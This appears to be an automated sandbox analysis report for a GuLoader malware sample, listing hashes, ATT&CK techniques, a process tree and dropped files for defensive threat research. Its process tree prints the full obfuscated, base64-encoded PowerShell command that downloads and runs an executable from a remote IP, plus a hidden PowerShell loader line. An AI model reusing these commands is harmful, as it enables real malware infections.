guloader | 4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82

Analysis

max time kernel
139s
max time network
19s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
26-09-2024 01:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82.hta
Size

115KB
MD5

e9e36b1d6323ad3225e16dd0d6992140
SHA1

a60f66174b84e52d090137011bc58d0e4e3d2d68
SHA256

4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82
SHA512

b274ad46d1b701a574e782c7c96f8717eff52e193305666288f12fa8860f25eacced86b1024c0cc3f2951b20c8c9d05772e03191cbf419b3cc9e21c668688d17
SSDEEP

48:7oa+apd7Ah23j0eQqYaH5PqYa8h7j5glG8smrVZA99Ddv2dzjZlUqYaXHqYaAhFj:Ea+M7xQOPNTUfofF2VoYHLzLHjrUAT

Score

10^/10

guloader defense_evasion discovery downloader execution

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2108	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
992	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
1208	cmd.exe
2108	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2660	audiodg.exe

Loads dropped DLL 5 IoCs

pid	Process
2108	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
2872	Conspect124.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
992	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 992 set thread context of 2872	992	powershell.exe	39

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\omdigtendes.udd	audiodg.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Fonts\knytt\Ballistics.mus	audiodg.exe
File opened for modification	C:\Windows\resources\villan\Knastakslerne.ini	audiodg.exe
File created	C:\Windows\brandbombernes.lnk	audiodg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	audiodg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Conspect124.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe
992	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
992	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	992	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 2468 wrote to memory of 1208	2468	mshta.exe	29
PID 2468 wrote to memory of 1208	2468	mshta.exe	29
PID 2468 wrote to memory of 1208	2468	mshta.exe	29
PID 2468 wrote to memory of 1208	2468	mshta.exe	29
PID 1208 wrote to memory of 2108	1208	cmd.exe	31
PID 1208 wrote to memory of 2108	1208	cmd.exe	31
PID 1208 wrote to memory of 2108	1208	cmd.exe	31
PID 1208 wrote to memory of 2108	1208	cmd.exe	31
PID 2108 wrote to memory of 2644	2108	powershell.exe	32
PID 2108 wrote to memory of 2644	2108	powershell.exe	32
PID 2108 wrote to memory of 2644	2108	powershell.exe	32
PID 2108 wrote to memory of 2644	2108	powershell.exe	32
PID 2644 wrote to memory of 2804	2644	csc.exe	33
PID 2644 wrote to memory of 2804	2644	csc.exe	33
PID 2644 wrote to memory of 2804	2644	csc.exe	33
PID 2644 wrote to memory of 2804	2644	csc.exe	33
PID 2108 wrote to memory of 2660	2108	powershell.exe	35
PID 2108 wrote to memory of 2660	2108	powershell.exe	35
PID 2108 wrote to memory of 2660	2108	powershell.exe	35
PID 2108 wrote to memory of 2660	2108	powershell.exe	35
PID 2660 wrote to memory of 992	2660	audiodg.exe	36
PID 2660 wrote to memory of 992	2660	audiodg.exe	36
PID 2660 wrote to memory of 992	2660	audiodg.exe	36
PID 2660 wrote to memory of 992	2660	audiodg.exe	36
PID 992 wrote to memory of 2872	992	powershell.exe	39
PID 992 wrote to memory of 2872	992	powershell.exe	39
PID 992 wrote to memory of 2872	992	powershell.exe	39
PID 992 wrote to memory of 2872	992	powershell.exe	39
PID 992 wrote to memory of 2872	992	powershell.exe	39
PID 992 wrote to memory of 2872	992	powershell.exe	39

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\4cebd23193adc8cf5b28b41969c491df4243b1d3b02633327bc7dbcbb5ca9a82.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2468
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1208
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poweRSHElL.ExE -eX bYpAsS -nOp -W 1 -c DEVICEcrEdeNTIAldEpLOYment ; Iex($(Iex('[SystEm.tEXT.EnCoDInG]'+[CHar]58+[CHaR]0X3A+'uTf8.GetSTrINg([sySTEM.cOnveRt]'+[chAR]0X3a+[CHAr]0x3a+'FRoMbASE64strinG('+[cHAR]34+'JE5VQiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZVJEZUZpbklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaWUJ0dGZ6RixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkVUhULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRKdmFETCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1ZlVWJILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERCTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIm1RZW1lZ1dGRWl4IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1Fc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKeGR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICROVUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTcyLjMxLjE0LzM1MC9hdWRpb2RnLmV4ZSIsIiRlblY6QVBQREFUQVxhdWRpb2RnLmV4ZSIsMCwwKTtzdEFydC1TTEVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcYXVkaW9kZy5leGUi'+[cHar]34+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2npxp380.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES25E9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC25E8.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2804
  - - C:\Users\Admin\AppData\Roaming\audiodg.exe
      "C:\Users\Admin\AppData\Roaming\audiodg.exe"
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2660
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -windowstyle hidden "$Headcloths=Get-Content 'C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa';$Antinovels=$Headcloths.SubString(57477,3);.$Antinovels($Headcloths)"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:992
      - C:\Users\Admin\AppData\Local\Temp\Conspect124.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Conspect124.exe"
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2872

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2npxp380.dll

Filesize
3KB

MD5
7c388ee71be7e6ee0edc06f15afce053

SHA1
28f9b41efea46b7ac3809811ae087b245ae5761f

SHA256
67793668391a4732ca4b54106894b520eba2210a7e84ea090d01847c02de589f

SHA512
19f4d809eeeb8228b7ed4f3dce4e935b638e32b8b6f8018d23ef995afddf66b4ed90dad9ce8a008cb5c997feeb173560467387cc2436a241842fe8df7e5f7fe3

Download Submit
C:\Users\Admin\AppData\Local\Temp\2npxp380.pdb

Filesize
7KB

MD5
efdb529ecec0a55d22882a3a2a02d2da

SHA1
adf56f73e665453567060eb8bb3390421d2a1b1f

SHA256
326f5bb7c9e026eb1faaa4d56920043ea647bf9f44a5078ed8e81062219dbc97

SHA512
57f0dd9785f44fc305f7ade5b454b9fdd36e7d4112ac236dcd5557d4e1e55d11c2017ec640b396ca81fb86cdf1ca3fc2b2079ebd5b116cbdac32ab15334e84a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES25E9.tmp

Filesize
1KB

MD5
ccda6843cee2adf012c4b3ac305d71b8

SHA1
3aaf32ab13f26d481183cd4b582773692fcf9c96

SHA256
6d2780065ce4935d2e9f163fc23e21c06df2b199e8cddd79e3b5f222294b255d

SHA512
8cb6d4990af6f42e1b56e991140072a6d2e3bfba655c3086542bc83eedb5afefed6e3317727c0c35a9940d8dea35cdf08dab801f368ac2025c9312b74533b1de

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8L7M1PRFX29HPY1CMAPF.temp

Filesize
7KB

MD5
5b1d5e4667f83ba0c282f697601d263e

SHA1
995e40635352cfb4e365a8681e198a990ffefa65

SHA256
bf63a25fc475ff864cce0df6330d8042aa704cbb294d396704eb1d4b225b54a2

SHA512
9b4f7b19483ce51d633d4fc2181a71d8646a2fbba15dd705adf24673f1d0e9fd2b73fa5b516f8e87ea4969628eecde9b29c6250baaf855bca0ef26ed70912b94

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
53d16623c2fa9d3384bb1289cb0fd5aa

SHA1
11fddac39d4f7b8e627964bc5272459801dce0ef

SHA256
077c1a69a12bd46c72720c70cac000139e74594ce760f996ff96078510954c6b

SHA512
76441d43967d6ad235afa7fcf1ca6732de265db1747353c53ced6c78ef1cac29848c1bd60566891ca7e2c818f0b7b947772b62122065e1d911040f9d401ea8ea

Download Submit
C:\Users\Admin\AppData\Roaming\audiodg.exe

Filesize
971KB

MD5
7bd1cce43f6b48c8ddd492e5711fd17f

SHA1
3f650d8993c542682aa61c725ea1bb4ee93d259a

SHA256
c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b

SHA512
fe804b78cd734192664366364b099a5676d58101b9fe03c40c925cfe1cc202a99e04094d0fa93338ed831015d7ccd2ede88f04ab3cf6410542853a5a228face2

Download Submit
C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Epochally.Puk

Filesize
342KB

MD5
7e58d69270577649e3fec5909c0e0f20

SHA1
c92de1cdd263a8afab112624f7fe3dd991b11bc3

SHA256
d9271baaae1e38c317ab57e2e2ca4a0f3448b23adb16af5894f0a55f3ccf5728

SHA512
b1c38694c80459b66dc7a34017d6f6a11c57251e9eb6e4f96d14bde9917b0b4d3d85b2875aaf550ce2159dc119ede91705e0a4ab9a7ff78d81f4d20110667ee4

Download Submit
C:\Users\Admin\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Papyr.paa

Filesize
56KB

MD5
21f8b55eff5453c6e94223b12647704a

SHA1
8938162c626c171d76f37deebc2534e53d1870ed

SHA256
6d09c0544b4419ff08386626e6609b03036c999da12afb6ad3f1beb2673c0894

SHA512
e87a707edc2147a63e49900446cdf3eaab287b71b1ea0779a2dc4d696b543692b8e9d85e510b8343f0083f25f8df8349ce68010fec40029d6e09151a98fa92f3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2npxp380.0.cs

Filesize
479B

MD5
79d525f7443b9b32c04c66fdf771524a

SHA1
760c943c817a688bd0ae6d07ffad1c4d4b5496f1

SHA256
6a75cfe74270167848fea3d86e892883e9f43b9770da0200447561994dfd8d0d

SHA512
88bc46830dcf9f48c93ce8da04fce858f17877a3720fb9fa5633052d81df22c84bc2fd5048af34a7285fac106de77446484c125c2d1b0f5fadaac7b05eaa99df

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\2npxp380.cmdline

Filesize
309B

MD5
e4e9169216120f5082fc5a4d69531005

SHA1
9bcc98ed78b04b225596083b4ba65ec79a212a72

SHA256
81fcc007f0f383c1114b0095ca73d0e551ada3642ccddc446cc406ec0cfa2aa6

SHA512
3f5c04bb87b9985eefacf0de1a3ab25265205fdab68c286340cb03108a404363ad0ff3906f056da4eff1749b6840e4152b3e2a376cc721fe9880d4e0a884834d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC25E8.tmp

Filesize
652B

MD5
72dc58348dee3809576406bee468f79d

SHA1
d28acad08d14ed405d5ada3fe61232106dca8135

SHA256
ced3c7417e5c794f43023ebc28a1c6de4aaf936a94e772a658f84f6eb088a570

SHA512
e65d699a8b73104787242573bcba92e1c1a4abf9181a7ac605555a83394db88dfa2d70e3cbb9819edfb687dcf798ac0c1df18b4a44d46d0ee88927ceb5f2a68d

Download Submit
memory/992-54-0x0000000006220000-0x000000000B786000-memory.dmp

Filesize
85.4MB

Download
memory/2872-58-0x0000000001540000-0x0000000006AA6000-memory.dmp

Filesize
85.4MB

Download